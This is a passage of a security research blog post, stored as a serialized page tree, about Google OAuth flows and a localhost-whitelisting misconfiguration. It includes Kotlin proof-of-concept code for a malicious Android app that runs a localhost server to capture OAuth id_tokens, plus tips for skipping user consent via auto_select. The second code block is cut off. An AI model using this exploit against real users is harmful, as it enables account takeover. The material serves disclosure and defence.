exploits.","2025-10-16T12:00:00.000Z",[38463,38462],{"src":106923,"width":17,"height":18},"/posts/oauth-misconfigurations/title.png",[106925,106926],"oAuth","exchanges",{"type":24,"children":106928,"toc":109237},[106929,106935,106940,106946,106966,106972,106977,106990,106995,107003,107017,107026,107035,107049,107057,107068,107128,107134,107146,107195,107201,107206,107219,107226,107237,107257,107276,107297,107303,107316,107321,107327,107346,107971,107976,107989,108845,108850,108855,108861,108866,108872,108877,108890,108930,108936,108949,108954,108987,108992,108997,109022,109027,109039,109193,109198,109202,109214,109219,109223,109228,109233],{"type":27,"tag":28,"props":106930,"children":106932},{"id":106931},"exploiting-oauth",[106933],{"type":33,"value":106934},"Exploiting OAuth",{"type":27,"tag":36,"props":106936,"children":106937},{},[106938],{"type":33,"value":106939},"Our main research focus was related to recent vulnerabilities we found in some of our audits. One common issue we find is related to OAuth misconfigurations that can be exploited to achieve account takeover. To understand the vulnerability and the exploit itself, we first need to dig into the different OAuth flows and the configurations that can be made in the Google Cloud Console.",{"type":27,"tag":58,"props":106941,"children":106943},{"id":106942},"google-authentication-flows",[106944],{"type":33,"value":106945},"Google Authentication Flows",{"type":27,"tag":36,"props":106947,"children":106948},{},[106949,106951,106957,106959,106964],{"type":33,"value":106950},"During our research, we identified various Google Authentication flows that require different exploitation methods. The new/most recent flow is called GSI, which mainly uses ",{"type":27,"tag":84,"props":106952,"children":106954},{"className":106953},[],[106955],{"type":33,"value":106956},"postMessage",{"type":33,"value":106958}," for communication with the Relying Party (RP), and the old one mostly uses ",{"type":27,"tag":84,"props":106960,"children":106962},{"className":106961},[],[106963],{"type":33,"value":76999},{"type":33,"value":106965}," to send the token back to the RP.",{"type":27,"tag":26163,"props":106967,"children":106969},{"id":106968},"gsi-new-flow",[106970],{"type":33,"value":106971},"GSI (New Flow)",{"type":27,"tag":36,"props":106973,"children":106974},{},[106975],{"type":33,"value":106976},"The GSI flow also has two ways to authenticate the user to the RP:",{"type":27,"tag":1228,"props":106978,"children":106979},{},[106980,106985],{"type":27,"tag":1232,"props":106981,"children":106982},{},[106983],{"type":33,"value":106984},"Using FedCM API",{"type":27,"tag":1232,"props":106986,"children":106987},{},[106988],{"type":33,"value":106989},"Without using FedCM API",{"type":27,"tag":36,"props":106991,"children":106992},{},[106993],{"type":33,"value":106994},"FedCM (Federated Credentials Manager) is a new browser API that lets users authenticate natively to an RP using a third-party IdP.",{"type":27,"tag":36,"props":106996,"children":106997},{},[106998],{"type":27,"tag":12606,"props":106999,"children":107000},{},[107001],{"type":33,"value":107002},"FedCM Method",{"type":27,"tag":36,"props":107004,"children":107005},{},[107006,107008,107015],{"type":33,"value":107007},"The FedCM method basically follows this ",{"type":27,"tag":47,"props":107009,"children":107012},{"href":107010,"rel":107011},"https://privacysandbox.google.com/cookies/fedcm/why#user-interaction",[51],[107013],{"type":33,"value":107014},"user experience",{"type":33,"value":107016},". Users can log in by clicking a login button (which will open a \"choose your account\" prompt window) or by 1-tap UX (see images below).",{"type":27,"tag":36,"props":107018,"children":107019},{},[107020,107022],{"type":33,"value":107021},"The normal flow, clicking the \"sign in\" button:\n",{"type":27,"tag":126,"props":107023,"children":107025},{"alt":57817,"src":107024},"/posts/oauth-misconfigurations/image1.png",[],{"type":27,"tag":36,"props":107027,"children":107028},{},[107029,107031],{"type":33,"value":107030},"One-Tap popup shown when you open the page:\n",{"type":27,"tag":126,"props":107032,"children":107034},{"alt":57817,"src":107033},"/posts/oauth-misconfigurations/image2.png",[],{"type":27,"tag":36,"props":107036,"children":107037},{},[107038,107040,107047],{"type":33,"value":107039},"Both flows use FedCM API to authenticate using Google IdP service, which makes some CORS requests to the IdP server to return the token. After authenticating the first time, when the user returns to the same website after some time, it is possible to automatically reauthenticate using ",{"type":27,"tag":47,"props":107041,"children":107044},{"href":107042,"rel":107043},"https://github.com/w3c-fedid/FedCM/issues/429",[51],[107045],{"type":33,"value":107046},"FedCM auto-reauthentication",{"type":33,"value":107048},", which has certain preconditions that must be met.",{"type":27,"tag":36,"props":107050,"children":107051},{},[107052],{"type":27,"tag":12606,"props":107053,"children":107054},{},[107055],{"type":33,"value":107056},"Non-FedCM Method",{"type":27,"tag":36,"props":107058,"children":107059},{},[107060,107062,107067],{"type":33,"value":107061},"This method uses a popup window (or iframe) to open the Google OAuth consent page and return the token via ",{"type":27,"tag":84,"props":107063,"children":107065},{"className":107064},[],[107066],{"type":33,"value":106956},{"type":33,"value":736},{"type":27,"tag":12719,"props":107069,"children":107070},{},[107071,107076,107100,107105,107116],{"type":27,"tag":1232,"props":107072,"children":107073},{},[107074],{"type":33,"value":107075},"The user clicks the sign in button",{"type":27,"tag":1232,"props":107077,"children":107078},{},[107079,107081,107087,107089,107094,107095],{"type":33,"value":107080},"RP opens a popup/iframe to ",{"type":27,"tag":47,"props":107082,"children":107085},{"href":107083,"rel":107084},"https://accounts.google.com/o/oauth2/v2/auth",[51],[107086],{"type":33,"value":107083},{"type":33,"value":107088}," with some important parameters like ",{"type":27,"tag":84,"props":107090,"children":107092},{"className":107091},[],[107093],{"type":33,"value":76831},{"type":33,"value":1131},{"type":27,"tag":84,"props":107096,"children":107098},{"className":107097},[],[107099],{"type":33,"value":47380},{"type":27,"tag":1232,"props":107101,"children":107102},{},[107103],{"type":33,"value":107104},"The user clicks the \"Continue\" button to authorize authentication",{"type":27,"tag":1232,"props":107106,"children":107107},{},[107108,107110],{"type":33,"value":107109},"They get redirected to ",{"type":27,"tag":47,"props":107111,"children":107114},{"href":107112,"rel":107113},"https://accounts.google.com/gsi/transform",[51],[107115],{"type":33,"value":107112},{"type":27,"tag":1232,"props":107117,"children":107118},{},[107119,107121,107126],{"type":33,"value":107120},"/gsi/transform sends the token back to the RP via ",{"type":27,"tag":84,"props":107122,"children":107124},{"className":107123},[],[107125],{"type":33,"value":106956},{"type":33,"value":107127}," (after some SYN/ACK messages)",{"type":27,"tag":26163,"props":107129,"children":107131},{"id":107130},"oauth-20-old-flow",[107132],{"type":33,"value":107133},"OAuth 2.0 Old Flow",{"type":27,"tag":36,"props":107135,"children":107136},{},[107137,107139,107144],{"type":33,"value":107138},"The old flow also redirects the user to the Google OAuth consent page and then returns the token via a ",{"type":27,"tag":84,"props":107140,"children":107142},{"className":107141},[],[107143],{"type":33,"value":76999},{"type":33,"value":107145}," provided in the URL and validated by a whitelist configuration:",{"type":27,"tag":12719,"props":107147,"children":107148},{},[107149,107153,107174,107178],{"type":27,"tag":1232,"props":107150,"children":107151},{},[107152],{"type":33,"value":107075},{"type":27,"tag":1232,"props":107154,"children":107155},{},[107156,107157,107162,107163,107168,107169],{"type":33,"value":107080},{"type":27,"tag":47,"props":107158,"children":107160},{"href":107083,"rel":107159},[51],[107161],{"type":33,"value":107083},{"type":33,"value":107088},{"type":27,"tag":84,"props":107164,"children":107166},{"className":107165},[],[107167],{"type":33,"value":76831},{"type":33,"value":1131},{"type":27,"tag":84,"props":107170,"children":107172},{"className":107171},[],[107173],{"type":33,"value":76999},{"type":27,"tag":1232,"props":107175,"children":107176},{},[107177],{"type":33,"value":107104},{"type":27,"tag":1232,"props":107179,"children":107180},{},[107181,107182,107187,107189],{"type":33,"value":107109},{"type":27,"tag":84,"props":107183,"children":107185},{"className":107184},[],[107186],{"type":33,"value":76999},{"type":33,"value":107188}," with the token in the query parameters or ",{"type":27,"tag":84,"props":107190,"children":107192},{"className":107191},[],[107193],{"type":33,"value":107194},"location.hash",{"type":27,"tag":26163,"props":107196,"children":107198},{"id":107197},"different-configurations",[107199],{"type":33,"value":107200},"Different Configurations",{"type":27,"tag":36,"props":107202,"children":107203},{},[107204],{"type":33,"value":107205},"These two flows must be configured differently in the Google Cloud Console. There are two whitelist configurations that we can control:",{"type":27,"tag":1228,"props":107207,"children":107208},{},[107209,107214],{"type":27,"tag":1232,"props":107210,"children":107211},{},[107212],{"type":33,"value":107213},"Authorized origins",{"type":27,"tag":1232,"props":107215,"children":107216},{},[107217],{"type":33,"value":107218},"Authorized redirect URIs",{"type":27,"tag":36,"props":107220,"children":107221},{},[107222],{"type":27,"tag":126,"props":107223,"children":107225},{"alt":57817,"src":107224},"/posts/oauth-misconfigurations/image3.png",[],{"type":27,"tag":36,"props":107227,"children":107228},{},[107229,107231,107236],{"type":33,"value":107230},"The described GSI flow doesn't use any redirection to send the token back to the RP, so the authorized redirect URI is not that important in the GSI flow. It uses the authorized origins to verify if the RP page is actually allowed to be authenticated using that ",{"type":27,"tag":84,"props":107232,"children":107234},{"className":107233},[],[107235],{"type":33,"value":76831},{"type":33,"value":1041},{"type":27,"tag":36,"props":107238,"children":107239},{},[107240,107242,107248,107250,107255],{"type":33,"value":107241},"The actual verification in the GSI flow happens in the CORS requests made by FedCM or in ",{"type":27,"tag":84,"props":107243,"children":107245},{"className":107244},[],[107246],{"type":33,"value":107247},"/oauth2/v2/auth",{"type":33,"value":107249}," by checking the ",{"type":27,"tag":84,"props":107251,"children":107253},{"className":107252},[],[107254],{"type":33,"value":47380},{"type":33,"value":107256}," query parameter.",{"type":27,"tag":36,"props":107258,"children":107259},{},[107260,107262,107267,107269,107274],{"type":33,"value":107261},"In the old flow, the ",{"type":27,"tag":84,"props":107263,"children":107265},{"className":107264},[],[107266],{"type":33,"value":76999},{"type":33,"value":107268}," parameter passed in the ",{"type":27,"tag":84,"props":107270,"children":107272},{"className":107271},[],[107273],{"type":33,"value":107247},{"type":33,"value":107275}," endpoint is validated against the authorized redirect URIs.",{"type":27,"tag":36,"props":107277,"children":107278},{},[107279,107281,107286,107288,107295],{"type":33,"value":107280},"Note that the new GSI flow can also have a different flow using ",{"type":27,"tag":84,"props":107282,"children":107284},{"className":107283},[],[107285],{"type":33,"value":76999},{"type":33,"value":107287}," validation. To execute this flow, you need to specify ",{"type":27,"tag":47,"props":107289,"children":107292},{"href":107290,"rel":107291},"https://developers.google.com/identity/gsi/web/reference/js-reference#login_uri",[51],[107293],{"type":33,"value":107294},"login_uri",{"type":33,"value":107296}," while using the SDK.",{"type":27,"tag":58,"props":107298,"children":107300},{"id":107299},"localhost-exploit",[107301],{"type":33,"value":107302},"Localhost Exploit",{"type":27,"tag":36,"props":107304,"children":107305},{},[107306,107308,107314],{"type":33,"value":107307},"During one of our audits, we found a bug related to how developers test the OAuth flow in their development environment. Developers often whitelist the ",{"type":27,"tag":84,"props":107309,"children":107311},{"className":107310},[],[107312],{"type":33,"value":107313},"localhost",{"type":33,"value":107315}," origin because it is considered trusted for local testing.",{"type":27,"tag":36,"props":107317,"children":107318},{},[107319],{"type":33,"value":107320},"Actually, this is partially true, as it depends on which security assumptions you make. This can be an issue in a mobile environment, as mobile apps can open localhost webservers without many permissions, and having a malicious app installed is not considered a significant issue on mobile since all applications are sandboxed. This configuration allows a malicious application to \"escape\" the sandbox and attack another system.",{"type":27,"tag":26163,"props":107322,"children":107324},{"id":107323},"exploit",[107325],{"type":33,"value":107326},"Exploit",{"type":27,"tag":36,"props":107328,"children":107329},{},[107330,107332,107337,107338,107344],{"type":33,"value":107331},"To exploit this misconfiguration, we first needed to understand the OAuth flow used by the target. If the OAuth implementation follows a standard flow without using Google Sign-In (GSI), we can extract the token via ",{"type":27,"tag":84,"props":107333,"children":107335},{"className":107334},[],[107336],{"type":33,"value":107194},{"type":33,"value":20411},{"type":27,"tag":84,"props":107339,"children":107341},{"className":107340},[],[107342],{"type":33,"value":107343},"location.search",{"type":33,"value":107345},". To achieve this, we developed a Kotlin application that spins up a local web server:",{"type":27,"tag":101,"props":107347,"children":107351},{"className":107348,"code":107349,"language":107350,"meta":7,"style":7},"language-kt shiki shiki-themes slack-dark"," override fun onCreate(savedInstanceState: Bundle?){\n super.onCreate(savedInstanceState)\n\n // Start the Ktor web server\n CoroutineScope(Dispatchers.IO).launch {\n try {\n startWebServer()\n Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n } catch (e: Exception) {\n Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n }\n }\n\n // Open the Google OAuth page\n val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n startActivity(browserIntent)\n }\n\n private fun startWebServer() {\n embeddedServer(CIO, port = 3000) {\n routing {\n get(\"{...}\") {\n call.respondHtml {\n head {\n meta(charset = \"UTF-8\")\n meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n title(\"OAuth Redirect\")\n }\n body {\n h1 { +\"Google OAuth Redirect\" }\n script {\n +\"document.body.innerText = location.hash;\"\n }\n }\n }\n }\n }\n }.start(wait = true)\n }\n","kt",[107352],{"type":27,"tag":84,"props":107353,"children":107354},{"__ignoreMap":7},[107355,107384,107403,107410,107417,107436,107447,107458,107489,107512,107559,107566,107573,107580,107587,107607,107638,107649,107656,107663,107682,107705,107716,107735,107750,107761,107784,107819,107838,107845,107856,107879,107890,107902,107909,107916,107923,107930,107937,107964],{"type":27,"tag":207,"props":107356,"children":107357},{"class":209,"line":210},[107358,107363,107367,107371,107375,107379],{"type":27,"tag":207,"props":107359,"children":107360},{"style":214},[107361],{"type":33,"value":107362}," override",{"type":27,"tag":207,"props":107364,"children":107365},{"style":214},[107366],{"type":33,"value":13489},{"type":27,"tag":207,"props":107368,"children":107369},{"style":1335},[107370],{"type":33,"value":77686},{"type":27,"tag":207,"props":107372,"children":107373},{"style":238},[107374],{"type":33,"value":77691},{"type":27,"tag":207,"props":107376,"children":107377},{"style":8920},[107378],{"type":33,"value":77696},{"type":27,"tag":207,"props":107380,"children":107381},{"style":238},[107382],{"type":33,"value":107383},"?){\n",{"type":27,"tag":207,"props":107385,"children":107386},{"class":209,"line":244},[107387,107391,107395,107399],{"type":27,"tag":207,"props":107388,"children":107389},{"style":214},[107390],{"type":33,"value":77709},{"type":27,"tag":207,"props":107392,"children":107393},{"style":238},[107394],{"type":33,"value":1041},{"type":27,"tag":207,"props":107396,"children":107397},{"style":1335},[107398],{"type":33,"value":77718},{"type":27,"tag":207,"props":107400,"children":107401},{"style":238},[107402],{"type":33,"value":77723},{"type":27,"tag":207,"props":107404,"children":107405},{"class":209,"line":270},[107406],{"type":27,"tag":207,"props":107407,"children":107408},{"emptyLinePlaceholder":19},[107409],{"type":33,"value":2062},{"type":27,"tag":207,"props":107411,"children":107412},{"class":209,"line":296},[107413],{"type":27,"tag":207,"props":107414,"children":107415},{"style":4647},[107416],{"type":33,"value":77738},{"type":27,"tag":207,"props":107418,"children":107419},{"class":209,"line":445},[107420,107424,107428,107432],{"type":27,"tag":207,"props":107421,"children":107422},{"style":1335},[107423],{"type":33,"value":77746},{"type":27,"tag":207,"props":107425,"children":107426},{"style":238},[107427],{"type":33,"value":77751},{"type":27,"tag":207,"props":107429,"children":107430},{"style":1335},[107431],{"type":33,"value":77756},{"type":27,"tag":207,"props":107433,"children":107434},{"style":238},[107435],{"type":33,"value":384},{"type":27,"tag":207,"props":107437,"children":107438},{"class":209,"line":867},[107439,107443],{"type":27,"tag":207,"props":107440,"children":107441},{"style":376},[107442],{"type":33,"value":77768},{"type":27,"tag":207,"props":107444,"children":107445},{"style":238},[107446],{"type":33,"value":384},{"type":27,"tag":207,"props":107448,"children":107449},{"class":209,"line":892},[107450,107454],{"type":27,"tag":207,"props":107451,"children":107452},{"style":1335},[107453],{"type":33,"value":77780},{"type":27,"tag":207,"props":107455,"children":107456},{"style":238},[107457],{"type":33,"value":15018},{"type":27,"tag":207,"props":107459,"children":107460},{"class":209,"line":1475},[107461,107465,107469,107473,107477,107481,107485],{"type":27,"tag":207,"props":107462,"children":107463},{"style":238},[107464],{"type":33,"value":77792},{"type":27,"tag":207,"props":107466,"children":107467},{"style":1335},[107468],{"type":33,"value":77797},{"type":27,"tag":207,"props":107470,"children":107471},{"style":238},[107472],{"type":33,"value":1343},{"type":27,"tag":207,"props":107474,"children":107475},{"style":1325},[107476],{"type":33,"value":77806},{"type":27,"tag":207,"props":107478,"children":107479},{"style":238},[107480],{"type":33,"value":1123},{"type":27,"tag":207,"props":107482,"children":107483},{"style":1325},[107484],{"type":33,"value":77815},{"type":27,"tag":207,"props":107486,"children":107487},{"style":238},[107488],{"type":33,"value":10449},{"type":27,"tag":207,"props":107490,"children":107491},{"class":209,"line":2065},[107492,107496,107500,107504,107508],{"type":27,"tag":207,"props":107493,"children":107494},{"style":238},[107495],{"type":33,"value":77827},{"type":27,"tag":207,"props":107497,"children":107498},{"style":214},[107499],{"type":33,"value":413},{"type":27,"tag":207,"props":107501,"children":107502},{"style":238},[107503],{"type":33,"value":77836},{"type":27,"tag":207,"props":107505,"children":107506},{"style":8920},[107507],{"type":33,"value":77841},{"type":27,"tag":207,"props":107509,"children":107510},{"style":238},[107511],{"type":33,"value":1424},{"type":27,"tag":207,"props":107513,"children":107514},{"class":209,"line":2092},[107515,107519,107523,107527,107531,107535,107539,107543,107547,107551,107555],{"type":27,"tag":207,"props":107516,"children":107517},{"style":238},[107518],{"type":33,"value":77792},{"type":27,"tag":207,"props":107520,"children":107521},{"style":1335},[107522],{"type":33,"value":1419},{"type":27,"tag":207,"props":107524,"children":107525},{"style":238},[107526],{"type":33,"value":1343},{"type":27,"tag":207,"props":107528,"children":107529},{"style":1325},[107530],{"type":33,"value":77806},{"type":27,"tag":207,"props":107532,"children":107533},{"style":238},[107534],{"type":33,"value":1123},{"type":27,"tag":207,"props":107536,"children":107537},{"style":1325},[107538],{"type":33,"value":77873},{"type":27,"tag":207,"props":107540,"children":107541},{"style":214},[107542],{"type":33,"value":41364},{"type":27,"tag":207,"props":107544,"children":107545},{"style":226},[107546],{"type":33,"value":77882},{"type":27,"tag":207,"props":107548,"children":107549},{"style":214},[107550],{"type":33,"value":41396},{"type":27,"tag":207,"props":107552,"children":107553},{"style":1325},[107554],{"type":33,"value":27331},{"type":27,"tag":207,"props":107556,"children":107557},{"style":238},[107558],{"type":33,"value":77895},{"type":27,"tag":207,"props":107560,"children":107561},{"class":209,"line":2130},[107562],{"type":27,"tag":207,"props":107563,"children":107564},{"style":238},[107565],{"type":33,"value":66118},{"type":27,"tag":207,"props":107567,"children":107568},{"class":209,"line":2168},[107569],{"type":27,"tag":207,"props":107570,"children":107571},{"style":238},[107572],{"type":33,"value":10637},{"type":27,"tag":207,"props":107574,"children":107575},{"class":209,"line":4095},[107576],{"type":27,"tag":207,"props":107577,"children":107578},{"emptyLinePlaceholder":19},[107579],{"type":33,"value":2062},{"type":27,"tag":207,"props":107581,"children":107582},{"class":209,"line":4103},[107583],{"type":27,"tag":207,"props":107584,"children":107585},{"style":4647},[107586],{"type":33,"value":77924},{"type":27,"tag":207,"props":107588,"children":107589},{"class":209,"line":4154},[107590,107594,107598,107602],{"type":27,"tag":207,"props":107591,"children":107592},{"style":214},[107593],{"type":33,"value":77932},{"type":27,"tag":207,"props":107595,"children":107596},{"style":238},[107597],{"type":33,"value":77937},{"type":27,"tag":207,"props":107599,"children":107600},{"style":226},[107601],{"type":33,"value":10380},{"type":27,"tag":207,"props":107603,"children":107604},{"style":1325},[107605],{"type":33,"value":107606}," \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n",{"type":27,"tag":207,"props":107608,"children":107609},{"class":209,"line":4203},[107610,107614,107618,107622,107626,107630,107634],{"type":27,"tag":207,"props":107611,"children":107612},{"style":214},[107613],{"type":33,"value":77932},{"type":27,"tag":207,"props":107615,"children":107616},{"style":238},[107617],{"type":33,"value":77958},{"type":27,"tag":207,"props":107619,"children":107620},{"style":226},[107621],{"type":33,"value":10380},{"type":27,"tag":207,"props":107623,"children":107624},{"style":1335},[107625],{"type":33,"value":77967},{"type":27,"tag":207,"props":107627,"children":107628},{"style":238},[107629],{"type":33,"value":77972},{"type":27,"tag":207,"props":107631,"children":107632},{"style":1335},[107633],{"type":33,"value":46457},{"type":27,"tag":207,"props":107635,"children":107636},{"style":238},[107637],{"type":33,"value":77981},{"type":27,"tag":207,"props":107639,"children":107640},{"class":209,"line":4249},[107641,107645],{"type":27,"tag":207,"props":107642,"children":107643},{"style":1335},[107644],{"type":33,"value":77989},{"type":27,"tag":207,"props":107646,"children":107647},{"style":238},[107648],{"type":33,"value":77994},{"type":27,"tag":207,"props":107650,"children":107651},{"class":209,"line":4290},[107652],{"type":27,"tag":207,"props":107653,"children":107654},{"style":238},[107655],{"type":33,"value":10645},{"type":27,"tag":207,"props":107657,"children":107658},{"class":209,"line":4304},[107659],{"type":27,"tag":207,"props":107660,"children":107661},{"emptyLinePlaceholder":19},[107662],{"type":33,"value":2062},{"type":27,"tag":207,"props":107664,"children":107665},{"class":209,"line":5466},[107666,107670,107674,107678],{"type":27,"tag":207,"props":107667,"children":107668},{"style":214},[107669],{"type":33,"value":78016},{"type":27,"tag":207,"props":107671,"children":107672},{"style":214},[107673],{"type":33,"value":13489},{"type":27,"tag":207,"props":107675,"children":107676},{"style":1335},[107677],{"type":33,"value":78025},{"type":27,"tag":207,"props":107679,"children":107680},{"style":238},[107681],{"type":33,"value":23011},{"type":27,"tag":207,"props":107683,"children":107684},{"class":209,"line":5530},[107685,107689,107693,107697,107701],{"type":27,"tag":207,"props":107686,"children":107687},{"style":1335},[107688],{"type":33,"value":78037},{"type":27,"tag":207,"props":107690,"children":107691},{"style":238},[107692],{"type":33,"value":78042},{"type":27,"tag":207,"props":107694,"children":107695},{"style":226},[107696],{"type":33,"value":10380},{"type":27,"tag":207,"props":107698,"children":107699},{"style":232},[107700],{"type":33,"value":78051},{"type":27,"tag":207,"props":107702,"children":107703},{"style":238},[107704],{"type":33,"value":1424},{"type":27,"tag":207,"props":107706,"children":107707},{"class":209,"line":7900},[107708,107712],{"type":27,"tag":207,"props":107709,"children":107710},{"style":1335},[107711],{"type":33,"value":78063},{"type":27,"tag":207,"props":107713,"children":107714},{"style":238},[107715],{"type":33,"value":384},{"type":27,"tag":207,"props":107717,"children":107718},{"class":209,"line":7909},[107719,107723,107727,107731],{"type":27,"tag":207,"props":107720,"children":107721},{"style":214},[107722],{"type":33,"value":78075},{"type":27,"tag":207,"props":107724,"children":107725},{"style":238},[107726],{"type":33,"value":1343},{"type":27,"tag":207,"props":107728,"children":107729},{"style":1325},[107730],{"type":33,"value":78084},{"type":27,"tag":207,"props":107732,"children":107733},{"style":238},[107734],{"type":33,"value":1424},{"type":27,"tag":207,"props":107736,"children":107737},{"class":209,"line":7917},[107738,107742,107746],{"type":27,"tag":207,"props":107739,"children":107740},{"style":238},[107741],{"type":33,"value":78096},{"type":27,"tag":207,"props":107743,"children":107744},{"style":1335},[107745],{"type":33,"value":78101},{"type":27,"tag":207,"props":107747,"children":107748},{"style":238},[107749],{"type":33,"value":384},{"type":27,"tag":207,"props":107751,"children":107752},{"class":209,"line":7926},[107753,107757],{"type":27,"tag":207,"props":107754,"children":107755},{"style":1335},[107756],{"type":33,"value":78113},{"type":27,"tag":207,"props":107758,"children":107759},{"style":238},[107760],{"type":33,"value":384},{"type":27,"tag":207,"props":107762,"children":107763},{"class":209,"line":7934},[107764,107768,107772,107776,107780],{"type":27,"tag":207,"props":107765,"children":107766},{"style":1335},[107767],{"type":33,"value":78125},{"type":27,"tag":207,"props":107769,"children":107770},{"style":238},[107771],{"type":33,"value":78130},{"type":27,"tag":207,"props":107773,"children":107774},{"style":226},[107775],{"type":33,"value":10380},{"type":27,"tag":207,"props":107777,"children":107778},{"style":1325},[107779],{"type":33,"value":78139},{"type":27,"tag":207,"props":107781,"children":107782},{"style":238},[107783],{"type":33,"value":10449},{"type":27,"tag":207,"props":107785,"children":107786},{"class":209,"line":7943},[107787,107791,107795,107799,107803,107807,107811,107815],{"type":27,"tag":207,"props":107788,"children":107789},{"style":1335},[107790],{"type":33,"value":78125},{"type":27,"tag":207,"props":107792,"children":107793},{"style":238},[107794],{"type":33,"value":78155},{"type":27,"tag":207,"props":107796,"children":107797},{"style":226},[107798],{"type":33,"value":10380},{"type":27,"tag":207,"props":107800,"children":107801},{"style":1325},[107802],{"type":33,"value":78164},{"type":27,"tag":207,"props":107804,"children":107805},{"style":238},[107806],{"type":33,"value":78169},{"type":27,"tag":207,"props":107808,"children":107809},{"style":226},[107810],{"type":33,"value":10380},{"type":27,"tag":207,"props":107812,"children":107813},{"style":1325},[107814],{"type":33,"value":78178},{"type":27,"tag":207,"props":107816,"children":107817},{"style":238},[107818],{"type":33,"value":10449},{"type":27,"tag":207,"props":107820,"children":107821},{"class":209,"line":7952},[107822,107826,107830,107834],{"type":27,"tag":207,"props":107823,"children":107824},{"style":1335},[107825],{"type":33,"value":78190},{"type":27,"tag":207,"props":107827,"children":107828},{"style":238},[107829],{"type":33,"value":1343},{"type":27,"tag":207,"props":107831,"children":107832},{"style":1325},[107833],{"type":33,"value":78199},{"type":27,"tag":207,"props":107835,"children":107836},{"style":238},[107837],{"type":33,"value":10449},{"type":27,"tag":207,"props":107839,"children":107840},{"class":209,"line":7961},[107841],{"type":27,"tag":207,"props":107842,"children":107843},{"style":238},[107844],{"type":33,"value":78211},{"type":27,"tag":207,"props":107846,"children":107847},{"class":209,"line":7969},[107848,107852],{"type":27,"tag":207,"props":107849,"children":107850},{"style":1335},[107851],{"type":33,"value":78219},{"type":27,"tag":207,"props":107853,"children":107854},{"style":238},[107855],{"type":33,"value":384},{"type":27,"tag":207,"props":107857,"children":107858},{"class":209,"line":7978},[107859,107863,107867,107871,107875],{"type":27,"tag":207,"props":107860,"children":107861},{"style":1335},[107862],{"type":33,"value":78231},{"type":27,"tag":207,"props":107864,"children":107865},{"style":238},[107866],{"type":33,"value":16862},{"type":27,"tag":207,"props":107868,"children":107869},{"style":226},[107870],{"type":33,"value":2227},{"type":27,"tag":207,"props":107872,"children":107873},{"style":1325},[107874],{"type":33,"value":78244},{"type":27,"tag":207,"props":107876,"children":107877},{"style":238},[107878],{"type":33,"value":16872},{"type":27,"tag":207,"props":107880,"children":107881},{"class":209,"line":7987},[107882,107886],{"type":27,"tag":207,"props":107883,"children":107884},{"style":1335},[107885],{"type":33,"value":78256},{"type":27,"tag":207,"props":107887,"children":107888},{"style":238},[107889],{"type":33,"value":384},{"type":27,"tag":207,"props":107891,"children":107892},{"class":209,"line":7996},[107893,107897],{"type":27,"tag":207,"props":107894,"children":107895},{"style":226},[107896],{"type":33,"value":78268},{"type":27,"tag":207,"props":107898,"children":107899},{"style":1325},[107900],{"type":33,"value":107901},"\"document.body.innerText = location.hash;\"\n",{"type":27,"tag":207,"props":107903,"children":107904},{"class":209,"line":8005},[107905],{"type":27,"tag":207,"props":107906,"children":107907},{"style":238},[107908],{"type":33,"value":78281},{"type":27,"tag":207,"props":107910,"children":107911},{"class":209,"line":8013},[107912],{"type":27,"tag":207,"props":107913,"children":107914},{"style":238},[107915],{"type":33,"value":78211},{"type":27,"tag":207,"props":107917,"children":107918},{"class":209,"line":8021},[107919],{"type":27,"tag":207,"props":107920,"children":107921},{"style":238},[107922],{"type":33,"value":78296},{"type":27,"tag":207,"props":107924,"children":107925},{"class":209,"line":8029},[107926],{"type":27,"tag":207,"props":107927,"children":107928},{"style":238},[107929],{"type":33,"value":78304},{"type":27,"tag":207,"props":107931,"children":107932},{"class":209,"line":8037},[107933],{"type":27,"tag":207,"props":107934,"children":107935},{"style":238},[107936],{"type":33,"value":66118},{"type":27,"tag":207,"props":107938,"children":107939},{"class":209,"line":8046},[107940,107944,107948,107952,107956,107960],{"type":27,"tag":207,"props":107941,"children":107942},{"style":238},[107943],{"type":33,"value":78319},{"type":27,"tag":207,"props":107945,"children":107946},{"style":1335},[107947],{"type":33,"value":946},{"type":27,"tag":207,"props":107949,"children":107950},{"style":238},[107951],{"type":33,"value":78328},{"type":27,"tag":207,"props":107953,"children":107954},{"style":226},[107955],{"type":33,"value":10380},{"type":27,"tag":207,"props":107957,"children":107958},{"style":214},[107959],{"type":33,"value":19746},{"type":27,"tag":207,"props":107961,"children":107962},{"style":238},[107963],{"type":33,"value":10449},{"type":27,"tag":207,"props":107965,"children":107966},{"class":209,"line":8055},[107967],{"type":27,"tag":207,"props":107968,"children":107969},{"style":238},[107970],{"type":33,"value":10645},{"type":27,"tag":36,"props":107972,"children":107973},{},[107974],{"type":33,"value":107975},"In this case, the prompt parameter can be omitted from the URL. This way, if the victim is already logged in, the OAuth 2.0 prompt interaction will be skipped.",{"type":27,"tag":36,"props":107977,"children":107978},{},[107979,107981,107987],{"type":33,"value":107980},"If Google Sign-In (GSI) is being used, we found that it's possible to use the ",{"type":27,"tag":84,"props":107982,"children":107984},{"className":107983},[],[107985],{"type":33,"value":107986},"auto_select",{"type":33,"value":107988}," parameter to trigger automatic reauthentication and bypass user interaction:",{"type":27,"tag":101,"props":107990,"children":107992},{"className":107348,"code":107991,"language":107350,"meta":7,"style":7}," override fun onCreate(savedInstanceState: Bundle?) {\n super.onCreate(savedInstanceState)\n\n CoroutineScope(Dispatchers.IO).launch {\n try {\n startWebServer()\n Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n } catch (e: Exception) {\n Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n }\n }\n\n val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(\"http://localhost:3000\"))\n startActivity(browserIntent)\n }\n\n private fun startWebServer() {\n embeddedServer(CIO, port = 3000) {\n routing {\n get(\"{...}\") {\n call.respondHtml {\n head {\n title(\"Test\")\n script {\n src = \"https://accounts.google.com/gsi/client\"\n 